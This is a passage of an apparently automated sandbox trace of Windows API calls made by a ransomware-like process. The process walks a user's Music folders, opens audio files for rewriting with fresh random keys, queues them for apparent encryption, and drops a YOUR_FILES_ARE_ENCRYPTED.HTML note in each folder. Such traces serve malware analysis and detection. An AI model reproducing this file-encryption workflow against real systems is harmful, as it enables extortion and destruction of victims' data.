lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\dtsKxQLk8egoL7tj.m4a") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\dtsKxQLk8egoL7tj.m4a" [0124.609] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x336df60, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.609] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x336df60, lpOverlapped=0x336df60) returned 1 [0124.612] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa7c7e00, ftCreationTime.dwHighDateTime=0x1d7044b, ftLastAccessTime.dwLowDateTime=0x50471f60, ftLastAccessTime.dwHighDateTime=0x1d70506, ftLastWriteTime.dwLowDateTime=0x50471f60, ftLastWriteTime.dwHighDateTime=0x1d70506, nFileSizeHigh=0x0, nFileSizeLow=0x10c7a, dwReserved0=0x19ec60, dwReserved1=0xffd95b9f, cFileName="gRfq03qGJiN.mp3", cAlternateFileName="GRFQ03~1.MP3")) returned 1 [0124.612] StrStrIW (lpFirst="gRfq03qGJiN.mp3", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.612] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\gRfq03qGJiN.mp3") returned 67 [0124.612] PathFindExtensionW (pszPath="gRfq03qGJiN.mp3") returned=".mp3" [0124.612] lstrlenW (lpString=".mp3") returned 4 [0124.612] PathFindExtensionW (pszPath="gRfq03qGJiN.mp3") returned=".mp3" [0124.612] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0124.612] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\gRfq03qGJiN.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\pbc7nvlksqbotxewzv9\\grfq03qgjin.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0124.613] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=68730) returned 1 [0124.613] GetProcessHeap () returned 0x600000 [0124.613] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x336df60 [0124.614] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="BA") returned 2 [0124.614] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="42") returned 2 [0124.614] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="55") returned 2 [0124.614] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="7B") returned 2 [0124.614] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="C6") returned 2 [0124.614] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="2B") returned 2 [0124.614] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="21") returned 2 [0124.614] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="79") returned 2 [0124.614] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="54") returned 2 [0124.614] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="AA") returned 2 [0124.614] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="A1") returned 2 [0124.614] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="27") returned 2 [0124.614] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="D4") returned 2 [0124.614] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="92") returned 2 [0124.614] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="FC") returned 2 [0124.614] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="CD") returned 2 [0124.614] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="2A") returned 2 [0124.614] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="DA") returned 2 [0124.614] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="4C") returned 2 [0124.614] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="82") returned 2 [0124.614] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="95") returned 2 [0124.614] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="46") returned 2 [0124.614] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="3A") returned 2 [0124.614] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="3E") returned 2 [0124.614] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="CF") returned 2 [0124.614] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="31") returned 2 [0124.614] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="F3") returned 2 [0124.614] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="E5") returned 2 [0124.615] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="C7") returned 2 [0124.615] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="9A") returned 2 [0124.615] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="B2") returned 2 [0124.615] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="1C") returned 2 [0124.615] lstrcpyW (in: lpString1=0x337e014, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\gRfq03qGJiN.mp3" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\gRfq03qGJiN.mp3") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\gRfq03qGJiN.mp3" [0124.615] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x336df60, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.615] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x336df60, lpOverlapped=0x336df60) returned 1 [0124.618] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97b51240, ftCreationTime.dwHighDateTime=0x1d70622, ftLastAccessTime.dwLowDateTime=0x7a60f840, ftLastAccessTime.dwHighDateTime=0x1d7075c, ftLastWriteTime.dwLowDateTime=0x7a60f840, ftLastWriteTime.dwHighDateTime=0x1d7075c, nFileSizeHigh=0x0, nFileSizeLow=0x28c3, dwReserved0=0x19ec60, dwReserved1=0xffd95b9f, cFileName="QOUnKwvlE.m4a", cAlternateFileName="QOUNKW~1.M4A")) returned 1 [0124.618] StrStrIW (lpFirst="QOUnKwvlE.m4a", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.619] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\QOUnKwvlE.m4a") returned 65 [0124.619] PathFindExtensionW (pszPath="QOUnKwvlE.m4a") returned=".m4a" [0124.619] lstrlenW (lpString=".m4a") returned 4 [0124.619] PathFindExtensionW (pszPath="QOUnKwvlE.m4a") returned=".m4a" [0124.619] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0124.619] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\QOUnKwvlE.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\pbc7nvlksqbotxewzv9\\qounkwvle.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0124.619] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=10435) returned 1 [0124.619] GetProcessHeap () returned 0x600000 [0124.619] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x336df60 [0124.620] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="3C") returned 2 [0124.620] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="B2") returned 2 [0124.620] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="C9") returned 2 [0124.620] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="EA") returned 2 [0124.620] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="FF") returned 2 [0124.620] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="B0") returned 2 [0124.620] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="11") returned 2 [0124.620] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="EE") returned 2 [0124.620] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="B5") returned 2 [0124.620] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="1F") returned 2 [0124.620] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="4F") returned 2 [0124.620] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="04") returned 2 [0124.620] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="D3") returned 2 [0124.620] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="98") returned 2 [0124.620] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="F3") returned 2 [0124.620] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="35") returned 2 [0124.620] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="8B") returned 2 [0124.620] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="6E") returned 2 [0124.620] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="00") returned 2 [0124.620] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="19") returned 2 [0124.620] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="0A") returned 2 [0124.620] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="8D") returned 2 [0124.620] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="CE") returned 2 [0124.620] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="66") returned 2 [0124.620] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="2A") returned 2 [0124.620] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="EB") returned 2 [0124.620] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="D1") returned 2 [0124.620] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="51") returned 2 [0124.620] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="53") returned 2 [0124.620] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="A7") returned 2 [0124.621] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="27") returned 2 [0124.621] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="2A") returned 2 [0124.621] lstrcpyW (in: lpString1=0x337e014, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\QOUnKwvlE.m4a" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\QOUnKwvlE.m4a") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\QOUnKwvlE.m4a" [0124.621] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x336df60, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.621] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x336df60, lpOverlapped=0x336df60) returned 1 [0124.624] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x57073d40, ftCreationTime.dwHighDateTime=0x1d7087f, ftLastAccessTime.dwLowDateTime=0x6d24c790, ftLastAccessTime.dwHighDateTime=0x1d70a74, ftLastWriteTime.dwLowDateTime=0x6d24c790, ftLastWriteTime.dwHighDateTime=0x1d70a74, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19ec60, dwReserved1=0xffd95b9f, cFileName="qsP3prU", cAlternateFileName="")) returned 1 [0124.624] StrStrIW (lpFirst="qsP3prU", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.624] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\qsP3prU") returned 59 [0124.624] GetProcessHeap () returned 0x600000 [0124.624] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0124.625] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\qsP3prU" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\qsP3prU") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\qsP3prU" [0124.625] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\qsP3prU", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\qsP3prU\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\qsP3prU\\*" [0124.625] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\qsP3prU\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x57073d40, ftCreationTime.dwHighDateTime=0x1d7087f, ftLastAccessTime.dwLowDateTime=0x6d24c790, ftLastAccessTime.dwHighDateTime=0x1d70a74, ftLastWriteTime.dwLowDateTime=0x6d24c790, ftLastWriteTime.dwHighDateTime=0x1d70a74, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x168845a, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0124.625] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x57073d40, ftCreationTime.dwHighDateTime=0x1d7087f, ftLastAccessTime.dwLowDateTime=0x6d24c790, ftLastAccessTime.dwHighDateTime=0x1d70a74, ftLastWriteTime.dwLowDateTime=0x6d24c790, ftLastWriteTime.dwHighDateTime=0x1d70a74, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x168845a, cFileName="..", cAlternateFileName="")) returned 1 [0124.626] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x706f5fd0, ftCreationTime.dwHighDateTime=0x1d6fa3b, ftLastAccessTime.dwLowDateTime=0x4f66b20, ftLastAccessTime.dwHighDateTime=0x1d70118, ftLastWriteTime.dwLowDateTime=0x4f66b20, ftLastWriteTime.dwHighDateTime=0x1d70118, nFileSizeHigh=0x0, nFileSizeLow=0x109fe, dwReserved0=0x19e94c, dwReserved1=0x168845a, cFileName="EGglS6C.wav", cAlternateFileName="")) returned 1 [0124.626] StrStrIW (lpFirst="EGglS6C.wav", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.626] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\qsP3prU\\EGglS6C.wav") returned 71 [0124.626] PathFindExtensionW (pszPath="EGglS6C.wav") returned=".wav" [0124.626] lstrlenW (lpString=".wav") returned 4 [0124.626] PathFindExtensionW (pszPath="EGglS6C.wav") returned=".wav" [0124.626] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0124.626] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\qsP3prU\\EGglS6C.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\pbc7nvlksqbotxewzv9\\qsp3pru\\eggls6c.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0124.626] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=68094) returned 1 [0124.626] GetProcessHeap () returned 0x600000 [0124.626] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x336df60 [0124.627] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="9D") returned 2 [0124.627] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="A4") returned 2 [0124.627] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="6C") returned 2 [0124.627] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="0B") returned 2 [0124.627] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="47") returned 2 [0124.627] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="AE") returned 2 [0124.627] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="06") returned 2 [0124.627] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="46") returned 2 [0124.627] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="80") returned 2 [0124.627] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="C0") returned 2 [0124.627] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="E1") returned 2 [0124.627] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="91") returned 2 [0124.627] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="AF") returned 2 [0124.627] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="AA") returned 2 [0124.627] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="DB") returned 2 [0124.627] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="25") returned 2 [0124.627] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="C6") returned 2 [0124.627] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="1E") returned 2 [0124.627] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="1E") returned 2 [0124.627] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="28") returned 2 [0124.627] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="E2") returned 2 [0124.627] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="E6") returned 2 [0124.627] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="11") returned 2 [0124.627] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="34") returned 2 [0124.627] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="E8") returned 2 [0124.627] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="24") returned 2 [0124.628] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="8A") returned 2 [0124.628] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="B3") returned 2 [0124.628] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="2E") returned 2 [0124.628] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="A8") returned 2 [0124.628] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="6B") returned 2 [0124.628] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="4E") returned 2 [0124.628] lstrcpyW (in: lpString1=0x337e014, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\qsP3prU\\EGglS6C.wav" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\qsP3prU\\EGglS6C.wav") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\qsP3prU\\EGglS6C.wav" [0124.628] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x336df60, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.628] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x336df60, lpOverlapped=0x336df60) returned 1 [0124.631] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x706f5fd0, ftCreationTime.dwHighDateTime=0x1d6fa3b, ftLastAccessTime.dwLowDateTime=0x4f66b20, ftLastAccessTime.dwHighDateTime=0x1d70118, ftLastWriteTime.dwLowDateTime=0x4f66b20, ftLastWriteTime.dwHighDateTime=0x1d70118, nFileSizeHigh=0x0, nFileSizeLow=0x109fe, dwReserved0=0x19e94c, dwReserved1=0x168845a, cFileName="EGglS6C.wav", cAlternateFileName="")) returned 0 [0124.631] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0124.631] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\qsP3prU\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 89 [0124.631] GetProcessHeap () returned 0x600000 [0124.631] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3155038 [0124.632] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\qsP3prU\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\pbc7nvlksqbotxewzv9\\qsp3pru\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0124.632] WriteFile (in: hFile=0x32c, lpBuffer=0x3155038*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x3155038*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0124.633] CloseHandle (hObject=0x32c) returned 1 [0124.633] GetProcessHeap () returned 0x600000 [0124.633] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3155038 | out: hHeap=0x600000) returned 1 [0124.633] GetProcessHeap () returned 0x600000 [0124.633] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0124.634] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x898f24f0, ftCreationTime.dwHighDateTime=0x1d709d6, ftLastAccessTime.dwLowDateTime=0x6d749150, ftLastAccessTime.dwHighDateTime=0x1d709dc, ftLastWriteTime.dwLowDateTime=0x6d749150, ftLastWriteTime.dwHighDateTime=0x1d709dc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19ec60, dwReserved1=0xffd95b9f, cFileName="R5R-My iY_Mo5Vx", cAlternateFileName="R5R-MY~1")) returned 1 [0124.634] StrStrIW (lpFirst="R5R-My iY_Mo5Vx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.634] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx") returned 67 [0124.634] GetProcessHeap () returned 0x600000 [0124.634] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0124.634] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx" [0124.634] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\*" [0124.634] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x898f24f0, ftCreationTime.dwHighDateTime=0x1d709d6, ftLastAccessTime.dwLowDateTime=0x6d749150, ftLastAccessTime.dwHighDateTime=0x1d709dc, ftLastWriteTime.dwLowDateTime=0x6d749150, ftLastWriteTime.dwHighDateTime=0x1d709dc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x168845a, cFileName=".", cAlternateFileName="")) returned 0x626838 [0124.634] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x898f24f0, ftCreationTime.dwHighDateTime=0x1d709d6, ftLastAccessTime.dwLowDateTime=0x6d749150, ftLastAccessTime.dwHighDateTime=0x1d709dc, ftLastWriteTime.dwLowDateTime=0x6d749150, ftLastWriteTime.dwHighDateTime=0x1d709dc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x168845a, cFileName="..", cAlternateFileName="")) returned 1 [0124.634] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x320637d0, ftCreationTime.dwHighDateTime=0x1d70816, ftLastAccessTime.dwLowDateTime=0x495acdd0, ftLastAccessTime.dwHighDateTime=0x1d70a53, ftLastWriteTime.dwLowDateTime=0x495acdd0, ftLastWriteTime.dwHighDateTime=0x1d70a53, nFileSizeHigh=0x0, nFileSizeLow=0xd4ed, dwReserved0=0x19e94c, dwReserved1=0x168845a, cFileName="4mkyBkAvmV0qBfY.m4a", cAlternateFileName="4MKYBK~1.M4A")) returned 1 [0124.634] StrStrIW (lpFirst="4mkyBkAvmV0qBfY.m4a", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.634] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\4mkyBkAvmV0qBfY.m4a") returned 87 [0124.634] PathFindExtensionW (pszPath="4mkyBkAvmV0qBfY.m4a") returned=".m4a" [0124.634] lstrlenW 